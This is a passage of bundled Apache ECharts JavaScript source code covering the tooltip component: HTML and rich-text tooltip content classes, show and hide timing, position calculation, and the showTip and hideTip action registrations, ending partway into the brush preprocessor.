time);\n            }\n            else {\n                this.hide();\n            }\n        }\n    },\n\n    isShow: function () {\n        return this._show;\n    },\n\n    dispose: function () {\n        this.el.parentNode.removeChild(this.el);\n    },\n\n    getOuterSize: function () {\n        var width = this.el.clientWidth;\n        var height = this.el.clientHeight;\n\n        // Consider browser compatibility.\n        // IE8 does not support getComputedStyle.\n        if (document.defaultView && document.defaultView.getComputedStyle) {\n            var stl = document.defaultView.getComputedStyle(this.el);\n            if (stl) {\n                width += parseInt(stl.borderLeftWidth, 10) + parseInt(stl.borderRightWidth, 10);\n                height += parseInt(stl.borderTopWidth, 10) + parseInt(stl.borderBottomWidth, 10);\n            }\n        }\n\n        return {width: width, height: height};\n    }\n\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// import Group from 'zrender/src/container/Group';\n/**\n * @alias module:echarts/component/tooltip/TooltipRichContent\n * @constructor\n */\nfunction TooltipRichContent(api) {\n\n    this._zr = api.getZr();\n\n    this._show = false;\n\n    /**\n     * @private\n     */\n    this._hideTimeout;\n}\n\nTooltipRichContent.prototype = {\n\n    constructor: TooltipRichContent,\n\n    /**\n     * @private\n     * @type {boolean}\n     */\n    _enterable: true,\n\n    /**\n     * Update when tooltip is rendered\n     */\n    update: function () {\n        // noop\n    },\n\n    show: function (tooltipModel) {\n        if (this._hideTimeout) {\n            clearTimeout(this._hideTimeout);\n        }\n\n        this.el.attr('show', true);\n        this._show = true;\n    },\n\n    /**\n     * Set tooltip content\n     *\n     * @param {string} content rich text string of content\n     * @param {Object} markerRich rich text style\n     * @param {Object} tooltipModel tooltip model\n     */\n    setContent: function (content, markerRich, tooltipModel) {\n        if (this.el) {\n            this._zr.remove(this.el);\n        }\n\n        var markers = {};\n        var text = content;\n        var prefix = '{marker';\n        var suffix = '|}';\n        var startId = text.indexOf(prefix);\n        while (startId >= 0) {\n            var endId = text.indexOf(suffix);\n            var name = text.substr(startId + prefix.length, endId - startId - prefix.length);\n            if (name.indexOf('sub') > -1) {\n                markers['marker' + name] = {\n                    textWidth: 4,\n                    textHeight: 4,\n                    textBorderRadius: 2,\n                    textBackgroundColor: markerRich[name],\n                    // TODO: textOffset is not implemented for rich text\n                    textOffset: [3, 0]\n                };\n            }\n            else {\n                markers['marker' + name] = {\n                    textWidth: 10,\n                    textHeight: 10,\n                    textBorderRadius: 5,\n                    textBackgroundColor: markerRich[name]\n                };\n            }\n\n            text = text.substr(endId + 1);\n            startId = text.indexOf('{marker');\n        }\n\n        this.el = new Text({\n            style: {\n                rich: markers,\n                text: content,\n                textLineHeight: 20,\n                textBackgroundColor: tooltipModel.get('backgroundColor'),\n                textBorderRadius: tooltipModel.get('borderRadius'),\n                textFill: tooltipModel.get('textStyle.color'),\n                textPadding: tooltipModel.get('padding')\n            },\n            z: tooltipModel.get('z')\n        });\n        this._zr.add(this.el);\n\n        var self = this;\n        this.el.on('mouseover', function () {\n            // clear the timeout in hideLater and keep showing tooltip\n            if (self._enterable) {\n                clearTimeout(self._hideTimeout);\n                self._show = true;\n            }\n            self._inContent = true;\n        });\n        this.el.on('mouseout', function () {\n            if (self._enterable) {\n                if (self._show) {\n                    self.hideLater(self._hideDelay);\n                }\n            }\n            self._inContent = false;\n        });\n    },\n\n    setEnterable: function (enterable) {\n        this._enterable = enterable;\n    },\n\n    getSize: function () {\n        var bounding = this.el.getBoundingRect();\n        return [bounding.width, bounding.height];\n    },\n\n    moveTo: function (x, y) {\n        if (this.el) {\n            this.el.attr('position', [x, y]);\n        }\n    },\n\n    hide: function () {\n        if (this.el) {\n            this.el.hide();\n        }\n        this._show = false;\n    },\n\n    hideLater: function (time) {\n        if (this._show && !(this._inContent && this._enterable)) {\n            if (time) {\n                this._hideDelay = time;\n                // Set show false to avoid invoke hideLater mutiple times\n                this._show = false;\n                this._hideTimeout = setTimeout(bind(this.hide, this), time);\n            }\n            else {\n                this.hide();\n            }\n        }\n    },\n\n    isShow: function () {\n        return this._show;\n    },\n\n    getOuterSize: function () {\n        var size = this.getSize();\n        return {\n            width: size[0],\n            height: size[1]\n        };\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar bind$3 = bind;\nvar each$21 = each$1;\nvar parsePercent$2 = parsePercent$1;\n\nvar proxyRect = new Rect({\n    shape: {x: -1, y: -1, width: 2, height: 2}\n});\n\nextendComponentView({\n\n    type: 'tooltip',\n\n    init: function (ecModel, api) {\n        if (env$1.node) {\n            return;\n        }\n\n        var tooltipModel = ecModel.getComponent('tooltip');\n        var renderMode = tooltipModel.get('renderMode');\n        this._renderMode = getTooltipRenderMode(renderMode);\n\n        var tooltipContent;\n        if (this._renderMode === 'html') {\n            tooltipContent = new TooltipContent(api.getDom(), api, {\n                appendToBody: tooltipModel.get('appendToBody', true)\n            });\n            this._newLine = '<br/>';\n        }\n        else {\n            tooltipContent = new TooltipRichContent(api);\n            this._newLine = '\\n';\n        }\n\n        this._tooltipContent = tooltipContent;\n    },\n\n    render: function (tooltipModel, ecModel, api) {\n        if (env$1.node) {\n            return;\n        }\n\n        // Reset\n        this.group.removeAll();\n\n        /**\n         * @private\n         * @type {module:echarts/component/tooltip/TooltipModel}\n         */\n        this._tooltipModel = tooltipModel;\n\n        /**\n         * @private\n         * @type {module:echarts/model/Global}\n         */\n        this._ecModel = ecModel;\n\n        /**\n         * @private\n         * @type {module:echarts/ExtensionAPI}\n         */\n        this._api = api;\n\n        /**\n         * Should be cleaned when render.\n         * @private\n         * @type {Array.<Array.<Object>>}\n         */\n        this._lastDataByCoordSys = null;\n\n        /**\n         * @private\n         * @type {boolean}\n         */\n        this._alwaysShowContent = tooltipModel.get('alwaysShowContent');\n\n        var tooltipContent = this._tooltipContent;\n        tooltipContent.update();\n        tooltipContent.setEnterable(tooltipModel.get('enterable'));\n\n        this._initGlobalListener();\n\n        this._keepShow();\n    },\n\n    _initGlobalListener: function () {\n        var tooltipModel = this._tooltipModel;\n        var triggerOn = tooltipModel.get('triggerOn');\n\n        register(\n            'itemTooltip',\n            this._api,\n            bind$3(function (currTrigger, e, dispatchAction) {\n                // If 'none', it is not controlled by mouse totally.\n                if (triggerOn !== 'none') {\n                    if (triggerOn.indexOf(currTrigger) >= 0) {\n                        this._tryShow(e, dispatchAction);\n                    }\n                    else if (currTrigger === 'leave') {\n                        this._hide(dispatchAction);\n                    }\n                }\n            }, this)\n        );\n    },\n\n    _keepShow: function () {\n        var tooltipModel = this._tooltipModel;\n        var ecModel = this._ecModel;\n        var api = this._api;\n\n        // Try to keep the tooltip show when refreshing\n        if (this._lastX != null\n            && this._lastY != null\n            // When user is willing to control tooltip totally using API,\n            // self.manuallyShowTip({x, y}) might cause tooltip hide,\n            // which is not expected.\n            && tooltipModel.get('triggerOn') !== 'none'\n        ) {\n            var self = this;\n            clearTimeout(this._refreshUpdateTimeout);\n            this._refreshUpdateTimeout = setTimeout(function () {\n                // Show tip next tick after other charts are rendered\n                // In case highlight action has wrong result\n                // FIXME\n                !api.isDisposed() && self.manuallyShowTip(tooltipModel, ecModel, api, {\n                    x: self._lastX,\n                    y: self._lastY\n                });\n            });\n        }\n    },\n\n    /**\n     * Show tip manually by\n     * dispatchAction({\n     *     type: 'showTip',\n     *     x: 10,\n     *     y: 10\n     * });\n     * Or\n     * dispatchAction({\n     *      type: 'showTip',\n     *      seriesIndex: 0,\n     *      dataIndex or dataIndexInside or name\n     * });\n     *\n     *  TODO Batch\n     */\n    manuallyShowTip: function (tooltipModel, ecModel, api, payload) {\n        if (payload.from === this.uid || env$1.node) {\n            return;\n        }\n\n        var dispatchAction = makeDispatchAction$1(payload, api);\n\n        // Reset ticket\n        this._ticket = '';\n\n        // When triggered from axisPointer.\n        var dataByCoordSys = payload.dataByCoordSys;\n\n        if (payload.tooltip && payload.x != null && payload.y != null) {\n            var el = proxyRect;\n            el.position = [payload.x, payload.y];\n            el.update();\n            el.tooltip = payload.tooltip;\n            // Manually show tooltip while view is not using zrender elements.\n            this._tryShow({\n                offsetX: payload.x,\n                offsetY: payload.y,\n                target: el\n            }, dispatchAction);\n        }\n        else if (dataByCoordSys) {\n            this._tryShow({\n                offsetX: payload.x,\n                offsetY: payload.y,\n                position: payload.position,\n                dataByCoordSys: payload.dataByCoordSys,\n                tooltipOption: payload.tooltipOption\n            }, dispatchAction);\n        }\n        else if (payload.seriesIndex != null) {\n\n            if (this._manuallyAxisShowTip(tooltipModel, ecModel, api, payload)) {\n                return;\n            }\n\n            var pointInfo = findPointFromSeries(payload, ecModel);\n            var cx = pointInfo.point[0];\n            var cy = pointInfo.point[1];\n            if (cx != null && cy != null) {\n                this._tryShow({\n                    offsetX: cx,\n                    offsetY: cy,\n                    position: payload.position,\n                    target: pointInfo.el\n                }, dispatchAction);\n            }\n        }\n        else if (payload.x != null && payload.y != null) {\n            // FIXME\n            // should wrap dispatchAction like `axisPointer/globalListener` ?\n            api.dispatchAction({\n                type: 'updateAxisPointer',\n                x: payload.x,\n                y: payload.y\n            });\n\n            this._tryShow({\n                offsetX: payload.x,\n                offsetY: payload.y,\n                position: payload.position,\n                target: api.getZr().findHover(payload.x, payload.y).target\n            }, dispatchAction);\n        }\n    },\n\n    manuallyHideTip: function (tooltipModel, ecModel, api, payload) {\n        var tooltipContent = this._tooltipContent;\n\n        if (!this._alwaysShowContent && this._tooltipModel) {\n            tooltipContent.hideLater(this._tooltipModel.get('hideDelay'));\n        }\n\n        this._lastX = this._lastY = null;\n\n        if (payload.from !== this.uid) {\n            this._hide(makeDispatchAction$1(payload, api));\n        }\n    },\n\n    // Be compatible with previous design, that is, when tooltip.type is 'axis' and\n    // dispatchAction 'showTip' with seriesIndex and dataIndex will trigger axis pointer\n    // and tooltip.\n    _manuallyAxisShowTip: function (tooltipModel, ecModel, api, payload) {\n        var seriesIndex = payload.seriesIndex;\n        var dataIndex = payload.dataIndex;\n        var coordSysAxesInfo = ecModel.getComponent('axisPointer').coordSysAxesInfo;\n\n        if (seriesIndex == null || dataIndex == null || coordSysAxesInfo == null) {\n            return;\n        }\n\n        var seriesModel = ecModel.getSeriesByIndex(seriesIndex);\n        if (!seriesModel) {\n            return;\n        }\n\n        var data = seriesModel.getData();\n        var tooltipModel = buildTooltipModel([\n            data.getItemModel(dataIndex),\n            seriesModel,\n            (seriesModel.coordinateSystem || {}).model,\n            tooltipModel\n        ]);\n\n        if (tooltipModel.get('trigger') !== 'axis') {\n            return;\n        }\n\n        api.dispatchAction({\n            type: 'updateAxisPointer',\n            seriesIndex: seriesIndex,\n            dataIndex: dataIndex,\n            position: payload.position\n        });\n\n        return true;\n    },\n\n    _tryShow: function (e, dispatchAction) {\n        var el = e.target;\n        var tooltipModel = this._tooltipModel;\n\n        if (!tooltipModel) {\n            return;\n        }\n\n        // Save mouse x, mouse y. So we can try to keep showing the tip if chart is refreshed\n        this._lastX = e.offsetX;\n        this._lastY = e.offsetY;\n\n        var dataByCoordSys = e.dataByCoordSys;\n        if (dataByCoordSys && dataByCoordSys.length) {\n            this._showAxisTooltip(dataByCoordSys, e);\n        }\n        // Always show item tooltip if mouse is on the element with dataIndex\n        else if (el && el.dataIndex != null) {\n            this._lastDataByCoordSys = null;\n            this._showSeriesItemTooltip(e, el, dispatchAction);\n        }\n        // Tooltip provided directly. Like legend.\n        else if (el && el.tooltip) {\n            this._lastDataByCoordSys = null;\n            this._showComponentItemTooltip(e, el, dispatchAction);\n        }\n        else {\n            this._lastDataByCoordSys = null;\n            this._hide(dispatchAction);\n        }\n    },\n\n    _showOrMove: function (tooltipModel, cb) {\n        // showDelay is used in this case: tooltip.enterable is set\n        // as true. User intent to move mouse into tooltip and click\n        // something. `showDelay` makes it easyer to enter the content\n        // but tooltip do not move immediately.\n        var delay = tooltipModel.get('showDelay');\n        cb = bind(cb, this);\n        clearTimeout(this._showTimout);\n        delay > 0\n            ? (this._showTimout = setTimeout(cb, delay))\n            : cb();\n    },\n\n    _showAxisTooltip: function (dataByCoordSys, e) {\n        var ecModel = this._ecModel;\n        var globalTooltipModel = this._tooltipModel;\n\n        var point = [e.offsetX, e.offsetY];\n\n        var singleDefaultHTML = [];\n        var singleParamsList = [];\n        var singleTooltipModel = buildTooltipModel([\n            e.tooltipOption,\n            globalTooltipModel\n        ]);\n\n        var renderMode = this._renderMode;\n        var newLine = this._newLine;\n\n        var markers = {};\n\n        each$21(dataByCoordSys, function (itemCoordSys) {\n            // var coordParamList = [];\n            // var coordDefaultHTML = [];\n            // var coordTooltipModel = buildTooltipModel([\n            //     e.tooltipOption,\n            //     itemCoordSys.tooltipOption,\n            //     ecModel.getComponent(itemCoordSys.coordSysMainType, itemCoordSys.coordSysIndex),\n            //     globalTooltipModel\n            // ]);\n            // var displayMode = coordTooltipModel.get('displayMode');\n            // var paramsList = displayMode === 'single' ? singleParamsList : [];\n\n            each$21(itemCoordSys.dataByAxis, function (item) {\n                var axisModel = ecModel.getComponent(item.axisDim + 'Axis', item.axisIndex);\n                var axisValue = item.value;\n                var seriesDefaultHTML = [];\n\n                if (!axisModel || axisValue == null) {\n                    return;\n                }\n\n                var valueLabel = getValueLabel(\n                    axisValue, axisModel.axis, ecModel,\n                    item.seriesDataIndices,\n                    item.valueLabelOpt\n                );\n\n                each$1(item.seriesDataIndices, function (idxItem) {\n                    var series = ecModel.getSeriesByIndex(idxItem.seriesIndex);\n                    var dataIndex = idxItem.dataIndexInside;\n                    var dataParams = series && series.getDataParams(dataIndex);\n                    dataParams.axisDim = item.axisDim;\n                    dataParams.axisIndex = item.axisIndex;\n                    dataParams.axisType = item.axisType;\n                    dataParams.axisId = item.axisId;\n                    dataParams.axisValue = getAxisRawValue(axisModel.axis, axisValue);\n                    dataParams.axisValueLabel = valueLabel;\n\n                    if (dataParams) {\n                        singleParamsList.push(dataParams);\n                        var seriesTooltip = series.formatTooltip(dataIndex, true, null, renderMode);\n\n                        var html;\n                        if (isObject$1(seriesTooltip)) {\n                            html = seriesTooltip.html;\n                            var newMarkers = seriesTooltip.markers;\n                            merge(markers, newMarkers);\n                        }\n                        else {\n                            html = seriesTooltip;\n                        }\n                        seriesDefaultHTML.push(html);\n                    }\n                });\n\n                // Default tooltip content\n                // FIXME\n                // (1) shold be the first data which has name?\n                // (2) themeRiver, firstDataIndex is array, and first line is unnecessary.\n                var firstLine = valueLabel;\n                if (renderMode !== 'html') {\n                    singleDefaultHTML.push(seriesDefaultHTML.join(newLine));\n                }\n                else {\n                    singleDefaultHTML.push(\n                        (firstLine ? encodeHTML(firstLine) + newLine : '')\n                        + seriesDefaultHTML.join(newLine)\n                    );\n                }\n            });\n        }, this);\n\n        // In most case, the second axis is shown upper than the first one.\n        singleDefaultHTML.reverse();\n        singleDefaultHTML = singleDefaultHTML.join(this._newLine + this._newLine);\n\n        var positionExpr = e.position;\n        this._showOrMove(singleTooltipModel, function () {\n            if (this._updateContentNotChangedOnAxis(dataByCoordSys)) {\n                this._updatePosition(\n                    singleTooltipModel,\n                    positionExpr,\n                    point[0], point[1],\n                    this._tooltipContent,\n                    singleParamsList\n                );\n            }\n            else {\n                this._showTooltipContent(\n                    singleTooltipModel, singleDefaultHTML, singleParamsList, Math.random(),\n                    point[0], point[1], positionExpr, undefined, markers\n                );\n            }\n        });\n\n        // Do not trigger events here, because this branch only be entered\n        // from dispatchAction.\n    },\n\n    _showSeriesItemTooltip: function (e, el, dispatchAction) {\n        var ecModel = this._ecModel;\n        // Use dataModel in element if possible\n        // Used when mouseover on a element like markPoint or edge\n        // In which case, the data is not main data in series.\n        var seriesIndex = el.seriesIndex;\n        var seriesModel = ecModel.getSeriesByIndex(seriesIndex);\n\n        // For example, graph link.\n        var dataModel = el.dataModel || seriesModel;\n        var dataIndex = el.dataIndex;\n        var dataType = el.dataType;\n        var data = dataModel.getData();\n\n        var tooltipModel = buildTooltipModel([\n            data.getItemModel(dataIndex),\n            dataModel,\n            seriesModel && (seriesModel.coordinateSystem || {}).model,\n            this._tooltipModel\n        ]);\n\n        var tooltipTrigger = tooltipModel.get('trigger');\n        if (tooltipTrigger != null && tooltipTrigger !== 'item') {\n            return;\n        }\n\n        var params = dataModel.getDataParams(dataIndex, dataType);\n        var seriesTooltip = dataModel.formatTooltip(dataIndex, false, dataType, this._renderMode);\n        var defaultHtml;\n        var markers;\n        if (isObject$1(seriesTooltip)) {\n            defaultHtml = seriesTooltip.html;\n            markers = seriesTooltip.markers;\n        }\n        else {\n            defaultHtml = seriesTooltip;\n            markers = null;\n        }\n\n        var asyncTicket = 'item_' + dataModel.name + '_' + dataIndex;\n\n        this._showOrMove(tooltipModel, function () {\n            this._showTooltipContent(\n                tooltipModel, defaultHtml, params, asyncTicket,\n                e.offsetX, e.offsetY, e.position, e.target, markers\n            );\n        });\n\n        // FIXME\n        // duplicated showtip if manuallyShowTip is called from dispatchAction.\n        dispatchAction({\n            type: 'showTip',\n            dataIndexInside: dataIndex,\n            dataIndex: data.getRawIndex(dataIndex),\n            seriesIndex: seriesIndex,\n            from: this.uid\n        });\n    },\n\n    _showComponentItemTooltip: function (e, el, dispatchAction) {\n        var tooltipOpt = el.tooltip;\n        if (typeof tooltipOpt === 'string') {\n            var content = tooltipOpt;\n            tooltipOpt = {\n                content: content,\n                // Fixed formatter\n                formatter: content\n            };\n        }\n        var subTooltipModel = new Model(tooltipOpt, this._tooltipModel, this._ecModel);\n        var defaultHtml = subTooltipModel.get('content');\n        var asyncTicket = Math.random();\n\n        // Do not check whether `trigger` is 'none' here, because `trigger`\n        // only works on cooridinate system. In fact, we have not found case\n        // that requires setting `trigger` nothing on component yet.\n\n        this._showOrMove(subTooltipModel, function () {\n            this._showTooltipContent(\n                subTooltipModel, defaultHtml, subTooltipModel.get('formatterParams') || {},\n                asyncTicket, e.offsetX, e.offsetY, e.position, el\n            );\n        });\n\n        // If not dispatch showTip, tip may be hide triggered by axis.\n        dispatchAction({\n            type: 'showTip',\n            from: this.uid\n        });\n    },\n\n    _showTooltipContent: function (\n        tooltipModel, defaultHtml, params, asyncTicket, x, y, positionExpr, el, markers\n    ) {\n        // Reset ticket\n        this._ticket = '';\n\n        if (!tooltipModel.get('showContent') || !tooltipModel.get('show')) {\n            return;\n        }\n\n        var tooltipContent = this._tooltipContent;\n\n        var formatter = tooltipModel.get('formatter');\n        positionExpr = positionExpr || tooltipModel.get('position');\n        var html = defaultHtml;\n\n        if (formatter && typeof formatter === 'string') {\n            html = formatTpl(formatter, params, true);\n        }\n        else if (typeof formatter === 'function') {\n            var callback = bind$3(function (cbTicket, html) {\n                if (cbTicket === this._ticket) {\n                    tooltipContent.setContent(html, markers, tooltipModel);\n                    this._updatePosition(\n                        tooltipModel, positionExpr, x, y, tooltipContent, params, el\n                    );\n                }\n            }, this);\n            this._ticket = asyncTicket;\n            html = formatter(params, asyncTicket, callback);\n        }\n\n        tooltipContent.setContent(html, markers, tooltipModel);\n        tooltipContent.show(tooltipModel);\n\n        this._updatePosition(\n            tooltipModel, positionExpr, x, y, tooltipContent, params, el\n        );\n    },\n\n    /**\n     * @param  {string|Function|Array.<number>|Object} positionExpr\n     * @param  {number} x Mouse x\n     * @param  {number} y Mouse y\n     * @param  {boolean} confine Whether confine tooltip content in view rect.\n     * @param  {Object|<Array.<Object>} params\n     * @param  {module:zrender/Element} el target element\n     * @param  {module:echarts/ExtensionAPI} api\n     * @return {Array.<number>}\n     */\n    _updatePosition: function (tooltipModel, positionExpr, x, y, content, params, el) {\n        var viewWidth = this._api.getWidth();\n        var viewHeight = this._api.getHeight();\n\n        positionExpr = positionExpr || tooltipModel.get('position');\n\n        var contentSize = content.getSize();\n        var align = tooltipModel.get('align');\n        var vAlign = tooltipModel.get('verticalAlign');\n        var rect = el && el.getBoundingRect().clone();\n        el && rect.applyTransform(el.transform);\n\n        if (typeof positionExpr === 'function') {\n            // Callback of position can be an array or a string specify the position\n            positionExpr = positionExpr([x, y], params, content.el, rect, {\n                viewSize: [viewWidth, viewHeight],\n                contentSize: contentSize.slice()\n            });\n        }\n\n        if (isArray(positionExpr)) {\n            x = parsePercent$2(positionExpr[0], viewWidth);\n            y = parsePercent$2(positionExpr[1], viewHeight);\n        }\n        else if (isObject$1(positionExpr)) {\n            positionExpr.width = contentSize[0];\n            positionExpr.height = contentSize[1];\n            var layoutRect = getLayoutRect(\n                positionExpr, {width: viewWidth, height: viewHeight}\n            );\n            x = layoutRect.x;\n            y = layoutRect.y;\n            align = null;\n            // When positionExpr is left/top/right/bottom,\n            // align and verticalAlign will not work.\n            vAlign = null;\n        }\n        // Specify tooltip position by string 'top' 'bottom' 'left' 'right' around graphic element\n        else if (typeof positionExpr === 'string' && el) {\n            var pos = calcTooltipPosition(\n                positionExpr, rect, contentSize\n            );\n            x = pos[0];\n            y = pos[1];\n        }\n        else {\n            var pos = refixTooltipPosition(\n                x, y, content, viewWidth, viewHeight, align ? null : 20, vAlign ? null : 20\n            );\n            x = pos[0];\n            y = pos[1];\n        }\n\n        align && (x -= isCenterAlign(align) ? contentSize[0] / 2 : align === 'right' ? contentSize[0] : 0);\n        vAlign && (y -= isCenterAlign(vAlign) ? contentSize[1] / 2 : vAlign === 'bottom' ? contentSize[1] : 0);\n\n        if (tooltipModel.get('confine')) {\n            var pos = confineTooltipPosition(\n                x, y, content, viewWidth, viewHeight\n            );\n            x = pos[0];\n            y = pos[1];\n        }\n\n        content.moveTo(x, y);\n    },\n\n    // FIXME\n    // Should we remove this but leave this to user?\n    _updateContentNotChangedOnAxis: function (dataByCoordSys) {\n        var lastCoordSys = this._lastDataByCoordSys;\n        var contentNotChanged = !!lastCoordSys\n            && lastCoordSys.length === dataByCoordSys.length;\n\n        contentNotChanged && each$21(lastCoordSys, function (lastItemCoordSys, indexCoordSys) {\n            var lastDataByAxis = lastItemCoordSys.dataByAxis || {};\n            var thisItemCoordSys = dataByCoordSys[indexCoordSys] || {};\n            var thisDataByAxis = thisItemCoordSys.dataByAxis || [];\n            contentNotChanged &= lastDataByAxis.length === thisDataByAxis.length;\n\n            contentNotChanged && each$21(lastDataByAxis, function (lastItem, indexAxis) {\n                var thisItem = thisDataByAxis[indexAxis] || {};\n                var lastIndices = lastItem.seriesDataIndices || [];\n                var newIndices = thisItem.seriesDataIndices || [];\n\n                contentNotChanged\n                    &= lastItem.value === thisItem.value\n                    && lastItem.axisType === thisItem.axisType\n                    && lastItem.axisId === thisItem.axisId\n                    && lastIndices.length === newIndices.length;\n\n                contentNotChanged && each$21(lastIndices, function (lastIdxItem, j) {\n                    var newIdxItem = newIndices[j];\n                    contentNotChanged\n                        &= lastIdxItem.seriesIndex === newIdxItem.seriesIndex\n                        && lastIdxItem.dataIndex === newIdxItem.dataIndex;\n                });\n            });\n        });\n\n        this._lastDataByCoordSys = dataByCoordSys;\n\n        return !!contentNotChanged;\n    },\n\n    _hide: function (dispatchAction) {\n        // Do not directly hideLater here, because this behavior may be prevented\n        // in dispatchAction when showTip is dispatched.\n\n        // FIXME\n        // duplicated hideTip if manuallyHideTip is called from dispatchAction.\n        this._lastDataByCoordSys = null;\n        dispatchAction({\n            type: 'hideTip',\n            from: this.uid\n        });\n    },\n\n    dispose: function (ecModel, api) {\n        if (env$1.node) {\n            return;\n        }\n        this._tooltipContent.dispose();\n        unregister('itemTooltip', api);\n    }\n});\n\n\n/**\n * @param {Array.<Object|module:echarts/model/Model>} modelCascade\n * From top to bottom. (the last one should be globalTooltipModel);\n */\nfunction buildTooltipModel(modelCascade) {\n    var resultModel = modelCascade.pop();\n    while (modelCascade.length) {\n        var tooltipOpt = modelCascade.pop();\n        if (tooltipOpt) {\n            if (Model.isInstance(tooltipOpt)) {\n                tooltipOpt = tooltipOpt.get('tooltip', true);\n            }\n            // In each data item tooltip can be simply write:\n            // {\n            //  value: 10,\n            //  tooltip: 'Something you need to know'\n            // }\n            if (typeof tooltipOpt === 'string') {\n                tooltipOpt = {formatter: tooltipOpt};\n            }\n            resultModel = new Model(tooltipOpt, resultModel, resultModel.ecModel);\n        }\n    }\n    return resultModel;\n}\n\nfunction makeDispatchAction$1(payload, api) {\n    return payload.dispatchAction || bind(api.dispatchAction, api);\n}\n\nfunction refixTooltipPosition(x, y, content, viewWidth, viewHeight, gapH, gapV) {\n    var size = content.getOuterSize();\n    var width = size.width;\n    var height = size.height;\n\n    if (gapH != null) {\n        if (x + width + gapH > viewWidth) {\n            x -= width + gapH;\n        }\n        else {\n            x += gapH;\n        }\n    }\n    if (gapV != null) {\n        if (y + height + gapV > viewHeight) {\n            y -= height + gapV;\n        }\n        else {\n            y += gapV;\n        }\n    }\n    return [x, y];\n}\n\nfunction confineTooltipPosition(x, y, content, viewWidth, viewHeight) {\n    var size = content.getOuterSize();\n    var width = size.width;\n    var height = size.height;\n\n    x = Math.min(x + width, viewWidth) - width;\n    y = Math.min(y + height, viewHeight) - height;\n    x = Math.max(x, 0);\n    y = Math.max(y, 0);\n\n    return [x, y];\n}\n\nfunction calcTooltipPosition(position, rect, contentSize) {\n    var domWidth = contentSize[0];\n    var domHeight = contentSize[1];\n    var gap = 5;\n    var x = 0;\n    var y = 0;\n    var rectWidth = rect.width;\n    var rectHeight = rect.height;\n    switch (position) {\n        case 'inside':\n            x = rect.x + rectWidth / 2 - domWidth / 2;\n            y = rect.y + rectHeight / 2 - domHeight / 2;\n            break;\n        case 'top':\n            x = rect.x + rectWidth / 2 - domWidth / 2;\n            y = rect.y - domHeight - gap;\n            break;\n        case 'bottom':\n            x = rect.x + rectWidth / 2 - domWidth / 2;\n            y = rect.y + rectHeight + gap;\n            break;\n        case 'left':\n            x = rect.x - domWidth - gap;\n            y = rect.y + rectHeight / 2 - domHeight / 2;\n            break;\n        case 'right':\n            x = rect.x + rectWidth + gap;\n            y = rect.y + rectHeight / 2 - domHeight / 2;\n    }\n    return [x, y];\n}\n\nfunction isCenterAlign(align) {\n    return align === 'center' || align === 'middle';\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// FIXME Better way to pack data in graphic element\n\n/**\n * @action\n * @property {string} type\n * @property {number} seriesIndex\n * @property {number} dataIndex\n * @property {number} [x]\n * @property {number} [y]\n */\nregisterAction(\n    {\n        type: 'showTip',\n        event: 'showTip',\n        update: 'tooltip:manuallyShowTip'\n    },\n    // noop\n    function () {}\n);\n\nregisterAction(\n    {\n        type: 'hideTip',\n        event: 'hideTip',\n        update: 'tooltip:manuallyHideTip'\n    },\n    // noop\n    function () {}\n);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar DEFAULT_TOOLBOX_BTNS = ['rect', 'polygon', 'keep', 'clear'];\n\nvar preprocessor$1 = function (option, isNew) {\n    var brushComponents = option && option.brush;\n    if (!isArray(brushComponents)) {\n        brushComponents = brushComponents ? [brushComponents] : [];\n    }\n\n    if (!brushComponents.length) {\n        return;\n    }\n\n    var brushComponentSpecifiedBtns = [];\n\n    each$1(brushComponents, function (brushOpt) {\n        var tbs = brushOpt.hasOwnProperty('toolbox')\n            ? brushOpt.toolbox : [];\n\n        if (tbs instanceof Array) {\n            brushComponentSpecifiedBtns = brushComponentSpecifiedBtns.concat(tbs);\n        }\n    });\n\n    var toolbox = option && option.toolbox;\n\n    if (isArray(toolbox)) {\n        toolbox = toolbox[0];\n    }\n    if (!toolbox) {\n        toolbox = {feature: {}};\n        option.toolbox = [toolbox];\n    }\n\n    var toolboxFeature = (toolbox.feature || (toolbox.feature = {}));\n    var toolboxBrush = toolboxFeature.brush || (toolboxFeature.brush = {});\n    var brushTypes = toolboxBrush.type || (toolboxBrush.type = []);\n\n    brushTypes.push.apply(brushTypes, 